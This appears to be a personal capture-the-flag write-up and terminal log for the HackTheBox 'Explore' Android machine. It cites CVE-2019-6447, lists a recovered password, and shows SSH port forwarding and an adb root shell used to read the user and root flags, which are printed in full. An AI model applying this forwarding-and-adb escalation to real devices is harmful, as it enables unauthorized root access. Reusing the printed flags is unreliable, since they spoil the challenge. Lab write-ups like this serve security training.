htb:Explore

Explore

• ssh port forwarding
• adb shell connect

CVE-2019-6447 getfile jpg:

kristi:Kr1sT!5h@Rp3xPl0r3!

──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln]
└─$ ssh kristi@10.10.10.247 -p2222 -L 5555:localhost:5555
Password authentication
Password: 
:/ $ ls         
acct                   init.superuser.rc       sbin                      
bin                    init.usb.configfs.rc    sdcard                    
bugreports             init.usb.rc             sepolicy                  
cache                  init.zygote32.rc        storage                   
charger                init.zygote64_32.rc     sys                       
config                 lib                     system                    
d                      mnt                     ueventd.android_x86_64.rc 
data                   odm                     ueventd.rc                
default.prop           oem                     vendor                    
dev                    plat_file_contexts      vendor_file_contexts      
etc                    plat_hwservice_contexts vendor_hwservice_contexts 
fstab.android_x86_64   plat_property_contexts  vendor_property_contexts  
init                   plat_seapp_contexts     vendor_seapp_contexts     
init.android_x86_64.rc plat_service_contexts   vendor_service_contexts   
init.environ.rc        proc                    vndservice_contexts       
init.rc                product                 
:/ $ cd sdcard
:/sdcard $ ls
Alarms  DCIM     Movies Notifications Podcasts  backups   user.txt 
Android Download Music  Pictures      Ringtones dianxinos 
:/sdcard $ cat user.txt
f32017174c7c7e8f50c6da52891ae250
:/sdcard $ 

──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln]
└─$ adb device              
Command 'adb' not found, but can be installed with:
sudo apt install adb
                                                                                                                    
┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln]
└─$ sudo apt install adb                                                                                      127 ⨯
[sudo] password for kali: 
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
  golang-1.17-go golang-1.17-src golang-src pkg-config
Use 'sudo apt autoremove' to remove them.
The following additional packages will be installed:
  android-libadb android-libbase android-libboringssl android-libcrypto-utils android-libcutils android-liblog
  android-sdk-platform-tools-common
The following NEW packages will be installed:
  adb android-libadb android-libbase android-libboringssl android-libcrypto-utils android-libcutils android-liblog
  android-sdk-platform-tools-common
0 upgraded, 8 newly installed, 0 to remove and 1142 not upgraded.
Need to get 1,021 kB of archives.
After this operation, 3,057 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-liblog amd64 1:10.0.0+r36-7 [44.4 kB]
Get:2 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-libbase amd64 1:10.0.0+r36-7 [41.5 kB]
Get:3 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-libboringssl amd64 10.0.0+r36-1 [612 kB]
Get:4 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-libcrypto-utils amd64 1:10.0.0+r36-7 [12.3 kB]
Get:5 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-libcutils amd64 1:10.0.0+r36-7 [33.3 kB]
Get:6 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-libadb amd64 1:10.0.0+r36-7 [165 kB]
Get:7 https://mirrors.aliyun.com/kali kali-rolling/main amd64 android-sdk-platform-tools-common all 28.0.2+3 [8,020 B]
Get:8 https://mirrors.aliyun.com/kali kali-rolling/main amd64 adb amd64 1:10.0.0+r36-7 [104 kB]
Fetched 1,021 kB in 11s (89.7 kB/s)
Selecting previously unselected package android-liblog.
(Reading database ... 279936 files and directories currently installed.)
Preparing to unpack .../0-android-liblog_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-liblog (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libbase.
Preparing to unpack .../1-android-libbase_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libbase (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libboringssl.
Preparing to unpack .../2-android-libboringssl_10.0.0+r36-1_amd64.deb ...
Unpacking android-libboringssl (10.0.0+r36-1) ...
Selecting previously unselected package android-libcrypto-utils.
Preparing to unpack .../3-android-libcrypto-utils_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libcrypto-utils (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libcutils.
Preparing to unpack .../4-android-libcutils_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libcutils (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libadb.
Preparing to unpack .../5-android-libadb_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libadb (1:10.0.0+r36-7) ...
Selecting previously unselected package android-sdk-platform-tools-common.
Preparing to unpack .../6-android-sdk-platform-tools-common_28.0.2+3_all.deb ...
Unpacking android-sdk-platform-tools-common (28.0.2+3) ...
Selecting previously unselected package adb.
Preparing to unpack .../7-adb_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking adb (1:10.0.0+r36-7) ...
Setting up android-sdk-platform-tools-common (28.0.2+3) ...
Setting up android-liblog (1:10.0.0+r36-7) ...
Setting up android-libboringssl (10.0.0+r36-1) ...
Setting up android-libcrypto-utils (1:10.0.0+r36-7) ...
Setting up android-libbase (1:10.0.0+r36-7) ...
Setting up android-libcutils (1:10.0.0+r36-7) ...
Setting up android-libadb (1:10.0.0+r36-7) ...
Setting up adb (1:10.0.0+r36-7) ...
Processing triggers for libc-bin (2.32-4) ...
Processing triggers for man-db (2.9.3-2) ...
Processing triggers for kali-menu (2021.1.4) ...
                                                                                                                    
┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln]
└─$ adb device
adb: unknown command device
                                                                                                                    
┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln]
└─$ adb devices                                                                                                 1 ⨯
* daemon not running; starting now at tcp:5037
* daemon started successfully
List of devices attached
emulator-5554   device

                                                                                                                    
┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln]
└─$ adb connect 127.0.0.1:5555
connected to 127.0.0.1:5555
                                                                                                                    
┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln]
└─$ adb -s localhost shell    
error: device 'localhost' not found
                                                                                                                    
┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln]
└─$ adb devices                                                                                                 1 ⨯
List of devices attached
127.0.0.1:5555  device
emulator-5554   device

                                                                                                                    
┌──(kali㉿kali)-[~/Desktop/ESFileExplorerOpenPortVuln]
└─$ adb -s 127.0.0.1 shell
x86_64:/ # whoami                                                                                                  
root
x86_64:/ # ls
acct                 init                   oem                     sys                       
bin                  init.android_x86_64.rc plat_file_contexts      system                    
bugreports           init.environ.rc        plat_hwservice_contexts ueventd.android_x86_64.rc 
cache                init.rc                plat_property_contexts  ueventd.rc                
charger              init.superuser.rc      plat_seapp_contexts     vendor                    
config               init.usb.configfs.rc   plat_service_contexts   vendor_file_contexts      
d                    init.usb.rc            proc                    vendor_hwservice_contexts 
data                 init.zygote32.rc       product                 vendor_property_contexts  
default.prop         init.zygote64_32.rc    sbin                    vendor_seapp_contexts     
dev                  lib                    sdcard                  vendor_service_contexts   
etc                  mnt                    sepolicy                vndservice_contexts       
fstab.android_x86_64 odm                    storage                 
x86_64:/ # cd data
x86_64:/data # ld
/system/bin/sh: ld: not found
127|x86_64:/data # ls
adb           app-lib     dalvik-cache  lost+found misc_de     resource-cache system_ce  vendor    
anr           app-private data          media      nfc         root.txt       system_de  vendor_ce 
app           backup      drm           mediadrm   ota         ss             tombstones vendor_de 
app-asec      bootchart   es_starter.sh misc       ota_package ssh_starter.sh user       
app-ephemeral cache       local         misc_ce    property    system         user_de    
x86_64:/data # cat root.txt
f04fc82b6d49b41c9b08982be59338c5
x86_64:/data #